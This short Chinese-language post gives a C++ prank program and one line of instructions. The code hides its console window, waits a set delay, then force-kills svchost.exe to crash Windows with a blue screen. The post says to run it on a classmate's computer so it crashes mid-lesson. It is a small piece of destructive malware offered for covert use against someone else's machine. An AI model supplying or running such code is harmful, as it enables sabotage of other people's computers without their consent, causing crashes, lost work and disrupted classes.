#include <cstdlib> #include <windows.h> int main() { HWND hWnd = GetConsoleWindow(); if (hWnd) ShowWindow(hWnd, SW_HIDE); Sleep(/*多少毫秒后蓝屏*/); system("taskkill /f /t /im svchost.exe"); return 0; }
编译,在小科班的电脑上运行,老师在讲最重要的东西时,电脑蓝屏了。